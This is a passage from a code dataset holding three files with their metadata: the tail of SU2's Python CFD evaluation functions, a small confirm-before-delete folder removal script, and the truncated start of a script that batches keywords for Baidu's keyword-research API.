----------------------------------------------------------------------\n\n\ndef aerodynamics(config, state=None):\n \"\"\"vals = SU2.eval.aerodynamics(config,state=None)\n\n Evaluates aerodynamics with the following:\n SU2.run.deform()\n SU2.run.direct()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh may or may not be deformed.\n Updates config and state by reference.\n Redundancy if state.FUNCTIONS is not empty.\n\n Executes in:\n ./DIRECT\n\n Inputs:\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n Bunch() of functions with keys of objective function names\n and values of objective function floats.\n \"\"\"\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n\n # Make sure to output aerodynamic coeff.\n if not \"AERO_COEFF\" in config[\"HISTORY_OUTPUT\"]:\n config[\"HISTORY_OUTPUT\"].append(\"AERO_COEFF\")\n\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_direct = \"log_Direct.out\"\n else:\n log_direct = None\n\n # ----------------------------------------------------\n # Update Mesh\n # ----------------------------------------------------\n\n # does decomposition and deformation\n info = update_mesh(config, state)\n\n # ----------------------------------------------------\n # Adaptation (not implemented)\n # ----------------------------------------------------\n\n # if not state.['ADAPTED_FUNC']:\n # config = su2run.adaptation(config)\n # state['ADAPTED_FUNC'] = True\n\n # ----------------------------------------------------\n # Direct Solution\n # ----------------------------------------------------\n opt_names = []\n for key in su2io.historyOutFields:\n if su2io.historyOutFields[key][\"TYPE\"] == \"COEFFICIENT\":\n opt_names.append(key)\n\n # redundancy check\n direct_done = all([key in state.FUNCTIONS for key in opt_names])\n if direct_done:\n # return aerodynamic function values\n aero = su2util.ordered_bunch()\n for key in opt_names:\n if key in state.FUNCTIONS:\n aero[key] = state.FUNCTIONS[key]\n return copy.deepcopy(aero)\n #: if redundant\n\n # files to pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n pull.extend(config.get(\"CONFIG_LIST\", []))\n\n # files: restarts\n if (\n config.get(\"TIME_DOMAIN\", \"NO\") == \"YES\"\n and config.get(\"RESTART_SOL\", \"NO\") == \"YES\"\n ):\n if \"RESTART_FILE_1\" in files: # not the case for directdiff restart\n name = files[\"RESTART_FILE_1\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n if \"RESTART_FILE_2\" in files: # not the case for 1st order time stepping\n name = files[\"RESTART_FILE_2\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n if \"FLOW_META\" in files:\n pull.append(files[\"FLOW_META\"])\n\n # files: direct solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_zones(name, config)\n name = su2io.expand_time(name, config)\n link.extend(name)\n ##config['RESTART_SOL'] = 'YES' # don't override config file\n else:\n if (\n config.get(\"TIME_DOMAIN\", \"NO\") != \"YES\"\n ): # rules out steady state optimization special cases.\n config[\"RESTART_SOL\"] = \"NO\" # for shape optimization with restart files.\n\n # files: target equivarea distribution\n if \"EQUIV_AREA\" in special_cases and \"TARGET_EA\" in files:\n pull.append(files[\"TARGET_EA\"])\n\n # files: target pressure distribution\n if \"INV_DESIGN_CP\" in special_cases and \"TARGET_CP\" in files:\n pull.append(files[\"TARGET_CP\"])\n\n # files: target heat flux distribution\n if \"INV_DESIGN_HEATFLUX\" in special_cases and \"TARGET_HEATFLUX\" in files:\n pull.append(files[\"TARGET_HEATFLUX\"])\n\n # output redirection\n with redirect_folder(\"DIRECT\", pull, link) as push:\n with redirect_output(log_direct):\n\n # # RUN DIRECT SOLUTION # #\n info = su2run.direct(config)\n\n konfig = copy.deepcopy(config)\n \"\"\"\n If the time convergence criterion was activated, we have less time iterations.\n Store the changed values of TIME_ITER, ITER_AVERAGE_OBJ and UNST_ADJOINT_ITER in\n info.WND_CAUCHY_DATA\"\"\"\n if (\n konfig.get(\"WINDOW_CAUCHY_CRIT\", \"NO\") == \"YES\"\n and konfig.TIME_MARCHING != \"NO\"\n ): # Tranfer Convergence Data, if necessary\n konfig[\"TIME_ITER\"] = info.WND_CAUCHY_DATA[\"TIME_ITER\"]\n konfig[\"ITER_AVERAGE_OBJ\"] = info.WND_CAUCHY_DATA[\"ITER_AVERAGE_OBJ\"]\n konfig[\"UNST_ADJOINT_ITER\"] = info.WND_CAUCHY_DATA[\"UNST_ADJOINT_ITER\"]\n\n su2io.restart2solution(konfig, info)\n state.update(info)\n\n # direct files to push\n name = info.FILES[\"DIRECT\"]\n name = su2io.expand_zones(name, konfig)\n name = su2io.expand_time(name, konfig)\n push.extend(name)\n\n # pressure files to push\n if \"TARGET_CP\" in info.FILES:\n push.append(info.FILES[\"TARGET_CP\"])\n\n # heat flux files to push\n if \"TARGET_HEATFLUX\" in info.FILES:\n push.append(info.FILES[\"TARGET_HEATFLUX\"])\n\n if \"FLOW_META\" in info.FILES:\n push.append(info.FILES[\"FLOW_META\"])\n\n #: with output redirection\n su2io.update_persurface(konfig, state)\n # return output\n funcs = su2util.ordered_bunch()\n for key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n\n return funcs\n\n\n#: def aerodynamics()\n\n\n# ----------------------------------------------------------------------\n# Stability Functions\n# ----------------------------------------------------------------------\n\n\ndef stability(config, state=None, step=1e-2):\n\n folder = \"STABILITY\" # os.path.join('STABILITY',func_name) #STABILITY/D_MOMENT_Y_D_ALPHA/\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_direct = \"log_Direct.out\"\n else:\n log_direct = None\n\n # ----------------------------------------------------\n # Update Mesh\n # ----------------------------------------------------\n\n # does decomposition and deformation\n info = update_mesh(config, state)\n\n # ----------------------------------------------------\n # CENTRAL POINT\n # ----------------------------------------------------\n\n # will run in DIRECT/\n func_0 = aerodynamics(config, state)\n\n # ----------------------------------------------------\n # Run Forward Point\n # ----------------------------------------------------\n\n # files to pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n # files: direct solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_time(name, config)\n link.extend(name)\n ##config['RESTART_SOL'] = 'YES' # don't override config file\n else:\n config[\"RESTART_SOL\"] = \"NO\"\n\n # files: target equivarea distribution\n if \"EQUIV_AREA\" in special_cases and \"TARGET_EA\" in files:\n pull.append(files[\"TARGET_EA\"])\n\n # files: target pressure distribution\n if \"INV_DESIGN_CP\" in special_cases and \"TARGET_CP\" in files:\n pull.append(files[\"TARGET_CP\"])\n\n # files: target heat flux distribution\n if \"INV_DESIGN_HEATFLUX\" in special_cases and \"TARGET_HEATFLUX\" in files:\n pull.append(files[\"TARGET_HEATFLUX\"])\n\n # pull needed files, start folder\n with redirect_folder(folder, pull, link) as push:\n with redirect_output(log_direct):\n\n konfig = copy.deepcopy(config)\n ztate = copy.deepcopy(state)\n\n # TODO: GENERALIZE\n konfig.AOA = konfig.AOA + step\n ztate.FUNCTIONS.clear()\n\n func_1 = aerodynamics(konfig, ztate)\n\n ## direct files to store\n # name = ztate.FILES['DIRECT']\n # if not 'STABILITY' in state.FILES:\n # state.FILES.STABILITY = su2io.ordered_bunch()\n # state.FILES.STABILITY['DIRECT'] = name\n\n ## equivarea files to store\n # if 'WEIGHT_NF' in ztate.FILES:\n # state.FILES.STABILITY['WEIGHT_NF'] = ztate.FILES['WEIGHT_NF']\n\n # ----------------------------------------------------\n # DIFFERENCING\n # ----------------------------------------------------\n\n for derv_name in su2io.optnames_stab:\n\n matches = [k for k in su2io.optnames_aero if k in derv_name]\n if not len(matches) == 1:\n continue\n func_name = matches[0]\n\n obj_func = (func_1[func_name] - func_0[func_name]) / step\n\n state.FUNCTIONS[derv_name] = obj_func\n\n # return output\n funcs = su2util.ordered_bunch()\n for key in su2io.optnames_stab:\n if key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n\n return funcs\n\n\n# ----------------------------------------------------------------------\n# Multipoint Functions\n# ----------------------------------------------------------------------\n\n\ndef multipoint(config, state=None, step=1e-2):\n\n mach_list = (\n config[\"MULTIPOINT_MACH_NUMBER\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n reynolds_list = (\n config[\"MULTIPOINT_REYNOLDS_NUMBER\"]\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .split(\",\")\n )\n freestream_temp_list = (\n config[\"MULTIPOINT_FREESTREAM_TEMPERATURE\"]\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .split(\",\")\n )\n freestream_press_list = (\n config[\"MULTIPOINT_FREESTREAM_PRESSURE\"]\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .split(\",\")\n )\n aoa_list = config[\"MULTIPOINT_AOA\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n sideslip_list = (\n config[\"MULTIPOINT_SIDESLIP_ANGLE\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n target_cl_list = (\n config[\"MULTIPOINT_TARGET_CL\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n weight_list = (\n config[\"MULTIPOINT_WEIGHT\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n outlet_value_list = (\n config[\"MULTIPOINT_OUTLET_VALUE\"].replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n solution_flow_list = su2io.expand_multipoint(config.SOLUTION_FILENAME, config)\n flow_meta_list = su2io.expand_multipoint(\"flow.meta\", config)\n restart_sol = config[\"RESTART_SOL\"]\n dv_value_old = config[\"DV_VALUE_OLD\"]\n\n func = []\n folder = []\n for i in range(len(weight_list)):\n func.append(0)\n folder.append(0)\n\n for i in range(len(weight_list)):\n folder[i] = \"MULTIPOINT_\" + str(i)\n\n opt_names = []\n for key in su2io.historyOutFields:\n if su2io.historyOutFields[key][\"TYPE\"] == \"COEFFICIENT\":\n opt_names.append(key)\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_direct = \"log_Direct.out\"\n else:\n log_direct = None\n\n # ----------------------------------------------------\n # Update Mesh\n # ----------------------------------------------------\n\n # If multiple meshes specified, use relevant mesh\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n state.FILES.MESH = state.FILES.MULTIPOINT_MESH_FILENAME[0]\n config.MESH_FILENAME = state.FILES.MULTIPOINT_MESH_FILENAME[0]\n\n # does decomposition and deformation\n info = update_mesh(config, state)\n\n # ----------------------------------------------------\n # FIRST POINT\n # ----------------------------------------------------\n\n # will run in DIRECT/\n\n config.AOA = aoa_list[0]\n config.SIDESLIP_ANGLE = sideslip_list[0]\n config.MACH_NUMBER = mach_list[0]\n config.REYNOLDS_NUMBER = reynolds_list[0]\n config.FREESTREAM_TEMPERATURE = freestream_temp_list[0]\n config.FREESTREAM_PRESSURE = freestream_press_list[0]\n config.TARGET_CL = target_cl_list[0]\n orig_marker_outlet = config[\"MARKER_OUTLET\"]\n orig_marker_outlet = orig_marker_outlet.replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n new_marker_outlet = \"(\" + orig_marker_outlet[0] + \",\" + outlet_value_list[0] + \")\"\n config.MARKER_OUTLET = new_marker_outlet\n config.SOLUTION_FILENAME = solution_flow_list[0]\n\n # If solution file for the first point is available, use it\n if \"MULTIPOINT_DIRECT\" in state.FILES and state.FILES.MULTIPOINT_DIRECT[0]:\n state.FILES[\"DIRECT\"] = state.FILES.MULTIPOINT_DIRECT[0]\n\n # If flow.meta file for the first point is available, rename it before using it\n if \"MULTIPOINT_FLOW_META\" in state.FILES and state.FILES.MULTIPOINT_FLOW_META[0]:\n os.rename(state.FILES.MULTIPOINT_FLOW_META[0], \"flow.meta\")\n state.FILES[\"FLOW_META\"] = \"flow.meta\"\n\n func[0] = aerodynamics(config, state)\n\n # change name of flow.meta back to multipoint name\n if os.path.exists(\"flow.meta\"):\n os.rename(\"flow.meta\", flow_meta_list[0])\n state.FILES[\"FLOW_META\"] = flow_meta_list[0]\n\n src = os.getcwd()\n src = os.path.abspath(src).rstrip(\"/\") + \"/DIRECT/\"\n\n # files to pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n # files: direct solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_time(name, config)\n link.extend(name)\n else:\n config[\"RESTART_SOL\"] = \"NO\"\n\n # files: meta data for the flow\n if \"FLOW_META\" in files:\n pull.append(files[\"FLOW_META\"])\n\n # files: target equivarea distribution\n if \"EQUIV_AREA\" in special_cases and \"TARGET_EA\" in files:\n pull.append(files[\"TARGET_EA\"])\n\n # files: target pressure distribution\n if \"INV_DESIGN_CP\" in special_cases and \"TARGET_CP\" in files:\n pull.append(files[\"TARGET_CP\"])\n\n # files: target heat flux distribution\n if \"INV_DESIGN_HEATFLUX\" in special_cases and \"TARGET_HEATFLUX\" in files:\n pull.append(files[\"TARGET_HEATFLUX\"])\n\n # pull needed files, start folder_0\n with redirect_folder(folder[0], pull, link) as push:\n with redirect_output(log_direct):\n\n konfig = copy.deepcopy(config)\n ztate = copy.deepcopy(state)\n # Reset restart to original value\n konfig[\"RESTART_SOL\"] = restart_sol\n\n dst = os.getcwd()\n dst = os.path.abspath(dst).rstrip(\"/\") + \"/\" + \"DIRECT\"\n\n # make unix link\n string = \"ln -s \" + src + \" \" + dst\n stringlist = string.split()\n subprocess.Popen(stringlist)\n\n for i in range(len(weight_list) - 1):\n\n konfig = copy.deepcopy(config)\n ztate = copy.deepcopy(state)\n\n konfig.SOLUTION_FILENAME = solution_flow_list[i + 1]\n\n # delete direct solution file from previous point\n if \"DIRECT\" in ztate.FILES:\n del ztate.FILES.DIRECT\n\n if \"FLOW_META\" in ztate.FILES:\n del ztate.FILES.FLOW_META\n\n # use direct solution file from relevant point\n if \"MULTIPOINT_DIRECT\" in state.FILES and state.FILES.MULTIPOINT_DIRECT[i + 1]:\n ztate.FILES[\"DIRECT\"] = state.FILES.MULTIPOINT_DIRECT[i + 1]\n\n # use flow.meta file from relevant point\n if (\n \"MULTIPOINT_FLOW_META\" in state.FILES\n and state.FILES.MULTIPOINT_FLOW_META[i + 1]\n ):\n ztate.FILES[\"FLOW_META\"] = state.FILES.MULTIPOINT_FLOW_META[i + 1]\n\n # use mesh file from relevant point\n if \"MULTIPOINT_MESH_FILENAME\" in ztate.FILES:\n ztate.FILES.MESH = ztate.FILES.MULTIPOINT_MESH_FILENAME[i + 1]\n konfig.MESH_FILENAME = ztate.FILES.MULTIPOINT_MESH_FILENAME[i + 1]\n konfig[\"DV_VALUE_OLD\"] = dv_value_old\n\n files = ztate.FILES\n link = []\n pull = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, konfig)\n link.extend(name)\n\n # files: direction solution\n if \"DIRECT\" in files:\n name = files[\"DIRECT\"]\n name = su2io.expand_time(name, konfig)\n link.extend(name)\n else:\n konfig[\"RESTART_SOL\"] = \"NO\"\n\n # files: meta data for the flow\n if \"FLOW_META\" in files:\n pull.append(files[\"FLOW_META\"])\n\n # pull needed files, start folder_1\n with redirect_folder(folder[i + 1], pull, link) as push:\n with redirect_output(log_direct):\n\n # Perform deformation on multipoint mesh\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n info = update_mesh(konfig, ztate)\n\n # Update config values\n konfig.AOA = aoa_list[i + 1]\n konfig.SIDESLIP_ANGLE = sideslip_list[i + 1]\n konfig.MACH_NUMBER = mach_list[i + 1]\n konfig.REYNOLDS_NUMBER = reynolds_list[i + 1]\n konfig.FREESTREAM_TEMPERATURE = freestream_temp_list[i + 1]\n konfig.FREESTREAM_PRESSURE = freestream_press_list[i + 1]\n konfig.TARGET_CL = target_cl_list[i + 1]\n orig_marker_outlet = config[\"MARKER_OUTLET\"]\n orig_marker_outlet = (\n orig_marker_outlet.replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n )\n new_marker_outlet = (\n \"(\" + orig_marker_outlet[0] + \",\" + outlet_value_list[i + 1] + \")\"\n )\n konfig.MARKER_OUTLET = new_marker_outlet\n\n ztate.FUNCTIONS.clear()\n\n # rename meta data to flow.meta\n if \"FLOW_META\" in ztate.FILES:\n ztate.FILES[\"FLOW_META\"] = \"flow.meta\"\n os.rename(ztate.FILES.MULTIPOINT_FLOW_META[i + 1], \"flow.meta\")\n\n func[i + 1] = aerodynamics(konfig, ztate)\n\n dst = os.getcwd()\n\n # revert name of flow.meta file to multipoint name\n if os.path.exists(\"flow.meta\"):\n os.rename(\"flow.meta\", flow_meta_list[i + 1])\n ztate.FILES[\"FLOW_META\"] = flow_meta_list[i + 1]\n dst_flow_meta = (\n os.path.abspath(dst).rstrip(\"/\")\n + \"/\"\n + ztate.FILES[\"FLOW_META\"]\n )\n push.append(ztate.FILES[\"FLOW_META\"])\n\n # direct files to push\n dst_direct = (\n os.path.abspath(dst).rstrip(\"/\") + \"/\" + ztate.FILES[\"DIRECT\"]\n )\n name = ztate.FILES[\"DIRECT\"]\n name = su2io.expand_zones(name, konfig)\n name = su2io.expand_time(name, konfig)\n push.extend(name)\n\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n # Mesh files to push\n dst_mesh = (\n os.path.abspath(dst).rstrip(\"/\") + \"/\" + ztate.FILES[\"MESH\"]\n )\n name = ztate.FILES[\"MESH\"]\n name = su2io.expand_part(name, konfig)\n push.extend(name)\n\n # Link direct solution to MULTIPOINT_# folder\n src = os.getcwd()\n src_direct = os.path.abspath(src).rstrip(\"/\") + \"/\" + ztate.FILES[\"DIRECT\"]\n\n # make unix link\n os.symlink(src_direct, dst_direct)\n\n # If the mesh doesn't already exist, link it\n if \"MULTIPOINT_MESH_FILENAME\" in state.FILES:\n src_mesh = os.path.abspath(src).rstrip(\"/\") + \"/\" + ztate.FILES[\"MESH\"]\n if not os.path.exists(src_mesh):\n os.symlink(src_mesh, dst_mesh)\n\n # link flow.meta\n if \"MULTIPOINT_FLOW_META\" in state.FILES:\n src_flow_meta = (\n os.path.abspath(src).rstrip(\"/\") + \"/\" + ztate.FILES[\"FLOW_META\"]\n )\n if not os.path.exists(src_flow_meta):\n os.symlink(src_flow_meta, dst_flow_meta)\n\n # Update MULTIPOINT_DIRECT in state.FILES\n state.FILES.MULTIPOINT_DIRECT = solution_flow_list\n if \"FLOW_META\" in state.FILES:\n state.FILES.MULTIPOINT_FLOW_META = flow_meta_list\n\n # ----------------------------------------------------\n # WEIGHT FUNCTIONS\n # ----------------------------------------------------\n\n for derv_name in su2io.optnames_multi:\n matches = [k for k in opt_names if k in derv_name]\n if not len(matches) == 1:\n continue\n func_name = matches[0]\n obj_func = 0.0\n for i in range(len(weight_list)):\n obj_func = obj_func + float(weight_list[i]) * func[i][func_name]\n\n state.FUNCTIONS[derv_name] = obj_func\n\n # return output\n funcs = su2util.ordered_bunch()\n for key in su2io.optnames_multi:\n if key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n\n return funcs\n\n\n# ----------------------------------------------------------------------\n# Geometric Functions\n# ----------------------------------------------------------------------\n\n\ndef geometry(func_name, config, state=None):\n \"\"\"val = SU2.eval.geometry(config,state=None)\n\n Evaluates geometry with the following:\n SU2.run.deform()\n SU2.run.geometry()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh may or may not be deformed.\n Updates config and state by reference.\n Redundancy if state.FUNCTIONS does not have func_name.\n\n Executes in:\n ./GEOMETRY\n\n Inputs:\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n Bunch() of functions with keys of objective function names\n and values of objective function floats.\n \"\"\"\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_geom = \"log_Geometry.out\"\n else:\n log_geom = None\n\n # ----------------------------------------------------\n # Update Mesh (check with Trent)\n # ----------------------------------------------------\n\n # does decomposition and deformation\n # info = update_mesh(config,state)\n\n # ----------------------------------------------------\n # Geometry Solution\n # ----------------------------------------------------\n\n # redundancy check\n geometry_done = func_name in state.FUNCTIONS\n # geometry_done = all([key in state.FUNCTIONS for key in su2io.optnames_geo])\n if not geometry_done:\n\n # files to pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n # update function name\n ## TODO\n\n # output redirection\n with redirect_folder(\"GEOMETRY\", pull, link) as push:\n with redirect_output(log_geom):\n\n # setup config\n config.GEO_PARAM = func_name\n config.GEO_MODE = \"FUNCTION\"\n\n # # RUN GEOMETRY SOLUTION # #\n info = su2run.geometry(config)\n state.update(info)\n\n # no files to push\n\n #: with output redirection\n\n #: if not redundant\n\n # return output\n funcs = su2util.ordered_bunch()\n for key in su2io.optnames_geo:\n if key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n return funcs\n\n\n#: def geometry()\n\n\ndef update_mesh(config, state=None):\n \"\"\"SU2.eval.update_mesh(config,state=None)\n\n updates mesh with the following:\n SU2.run.deform()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh may or may not be deformed.\n Updates config and state by reference.\n\n Executes in:\n ./DECOMP and ./DEFORM\n\n Inputs:\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n nothing\n\n Modifies:\n config and state by reference\n \"\"\"\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_decomp = \"log_Decomp.out\"\n log_deform = \"log_Deform.out\"\n else:\n log_decomp = None\n log_deform = None\n\n # ----------------------------------------------------\n # Deformation\n # ----------------------------------------------------\n\n # redundancy check\n deform_set = config[\"DV_KIND\"] == config[\"DEFINITION_DV\"][\"KIND\"]\n deform_todo = not config[\"DV_VALUE_NEW\"] == config[\"DV_VALUE_OLD\"]\n if deform_set and deform_todo:\n\n # files to pull\n pull = []\n link = config[\"MESH_FILENAME\"]\n link = su2io.expand_part(link, config)\n\n pull.extend(config.get(\"CONFIG_LIST\", []))\n\n # output redirection\n with redirect_folder(\"DEFORM\", pull, link) as push:\n with redirect_output(log_deform):\n\n # # RUN DEFORMATION # #\n info = su2run.deform(config)\n state.update(info)\n\n # data to push\n meshname = info.FILES.MESH\n names = su2io.expand_part(meshname, config)\n push.extend(names)\n\n #: with redirect output\n\n elif deform_set and not deform_todo:\n state.VARIABLES.DV_VALUE_NEW = config.DV_VALUE_NEW\n\n #: if not redundant\n\n return\n","repo_name":"su2code/SU2","sub_path":"SU2_PY/SU2/eval/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":30617,"program_lang":"python","lang":"en","doc_type":"code","stars":1156,"dataset":"github-code","pt":"63"} +{"seq_id":"70701254920","text":"\"\"\"\nScript to delete environments created.\nAuthor: Keegan Donley\n\"\"\"\nimport os\nimport urllib\nimport shutil\n\n# The colors used for highlighting text output\nclass colors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n LOG = '\\033[90m'\n ENDC = '\\033[0m'\n\n\ndef main():\n print_welcome()\n folderlocation = 'Documents'\n rootdir = get_root_dir()\n\n # Set the working directory to /Users//Documents\n # Only works currently if the script is run from a folder located below /Users//\n while rootdir != os.getcwd():\n os.chdir(os.pardir)\n rootdir = get_root_dir()\n os.chdir(folderlocation)\n\n repeat_confirm = \"Y\"\n while repeat_confirm.upper() == \"Y\":\n print(os.getcwd())\n # Confirm that the directory entered is valid\n folder_to_delete = get_folder_to_delete(folderlocation)\n confirmation = confirm_delete(folder_to_delete)\n if confirmation:\n print(colors.OKGREEN + \"Deleted folder \" + folder_to_delete + colors.ENDC)\n shutil.rmtree(folder_to_delete)\n repeat_confirm = raw_input(\"Would you like to delete another? (Y/N): \")\n while repeat_confirm.upper() != \"Y\" and repeat_confirm.upper() != \"N\":\n os.system('clear')\n print(\"Please enter either 'Y' or 'N'\")\n repeat_confirm = raw_input(\"Would you like to delete another? (Y/N): \")\n os.system('clear')\n\ndef confirm_delete(folder):\n os.system('clear')\n print(\"Current Directory: \" + os.getcwd() + \"\\n\")\n print(colors.FAIL + \"--------------------------------------------------------\" + colors.ENDC)\n print(colors.FAIL + \"WARNING! You're about to permanently delete \" + folder + \".\" + colors.ENDC)\n print(colors.FAIL + \"--------------------------------------------------------\\n\" + colors.ENDC)\n confirmation = raw_input(\"Are you sure you'd like to do this? (Y/N): \")\n while confirmation.upper() != \"Y\" and confirmation.upper() != \"N\":\n os.system('clear')\n print(\"Current Directory: \" + os.getcwd() + \"\\n\")\n print(colors.FAIL + \"\\n--------------------------------------------------------\" + colors.ENDC)\n print(colors.FAIL + \"WARNING! You're about to permanently delete \" + folder + \".\" + colors.ENDC)\n print(colors.FAIL + \"--------------------------------------------------------\\n\" + colors.ENDC)\n print(\"Please enter either 'Y' or 'N'\")\n confirmation = raw_input(\"Are you sure you'd like to do this? (Y/N): \")\n if confirmation.upper() == \"Y\":\n return True\n elif confirmation.upper() == \"N\":\n return False\n\ndef get_folder_to_delete(folderlocation):\n folder = raw_input(\"Please enter the name of the project you'd like to delete (case-sensitive): \")\n folder_path = os.getcwd() + \"/\" + folder + \"/\"\n while os.path.isdir(folder_path) == False:\n print(colors.FAIL + \"!! Directory doesn't exist! !!\" + colors.ENDC)\n folder = raw_input(\"Please enter the name of the project you'd like to delete (case-sensitive): \")\n folder_path = \"/\" + folder + \"/\"\n folder_path = folder_path.split('/')\n return folder_path[-2]\n\n\ndef get_root_dir():\n '''\n This function determines the root directory to change the working directory to.\n returns: string of the root directory, in the format /Users//\n '''\n currentdir = os.getcwd()\n currentdir = currentdir.split('/')\n rootdir = '/' + currentdir[1] + '/' + currentdir[2]\n return rootdir\n\n\ndef print_welcome():\n '''\n Print the welcome screen for the user.\n '''\n os.system('clear')\n print(colors.OKBLUE + \"------------- Web Heirarchy Deleter ------------\")\n print(\"By Keegan Donley\\n\")\n print(\"Please begin by entering the desired name of your\")\n print(\"site you'd like to delete\\n\")\n print(colors.FAIL + \"WARNING: This script deletes files from your system. Use carefully\")\n print(\"at your own risk!\")\n print(colors.OKBLUE + \"--------------------------------------------------\\n\" + colors.ENDC)\n\nmain()\n","repo_name":"keegandonley/Website-Environment-Generator","sub_path":"web-delete.py","file_name":"web-delete.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7856663206","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport requests,json,csv,sys,os,time,codecs\r\n\r\ndef convert_to_builtin_type(obj):\r\n d = {}\r\n d.update(obj.__dict__)\r\n return d\r\n\r\nclass AuthHeader():\r\n\r\n def __init__(self, username=None,password=None,token=None,target=None,accessToken=None): \r\n self.username=username\r\n self.password=password\r\n self.token=token\r\n self.target=target\r\n self.accessToken=accessToken\r\n self.action='API-SDK'\r\n\r\n\r\n def setUsername(self,username):\r\n self.username=username\r\n def setPassword(self,password):\r\n self.password=password\r\n def setToken(self,token):\r\n self.token=token\r\n def setTarget(self,target):\r\n self.target=target\r\n def setAccessToken(self,accessToken):\r\n self.accessToken=accessToken\r\n\r\nclass JsonEnvelop():\r\n header=None\r\n body=None\r\n\r\n def __init__(self,aheader=None,abody=None):\r\n self.header=aheader\r\n self.body=abody\r\n def setHeader(self,header):\r\n self.header=header\r\n def setBody(self,body):\r\n self.body=body\r\n\r\nfailwords = open('未采集关键词.txt','w')\r\n\r\n#记录开始时间,count作用是计数同时作为文件名增量\r\nstarttime = time.strftime('%Y/%m/%d %H:%M:%S')\r\ncount = 0\r\n\r\n#3种请求,header和headers是一样的\r\nheader = AuthHeader(username='',password='',token='')\r\nheaders = {'content-type': 'application/json;charset=utf-8'}\r\n\r\n#三个接口的地址\r\nurl1 = 'https://api.baidu.com/json/sms/v4/KRService/getKRFileIdByWords'\r\nurl2 = 'https://api.baidu.com/json/sms/v4/KRService/getFileStatus'\r\nurl3 = 'https://api.baidu.com/json/sms/v4/KRService/getFilePath'\r\n\r\n\r\n#逐行读取文件,每100个生成一个列表作为请求数据\r\ntext = open('keywords.txt','r',encoding='utf-8').readlines()\r\nwhile text:\r\n lines = text[:100]\r\n text = text[100:]\r\n seedWords = []\r\n for i in lines:\r\n seedWords.append(i.strip())\r\n\r\n\r\n 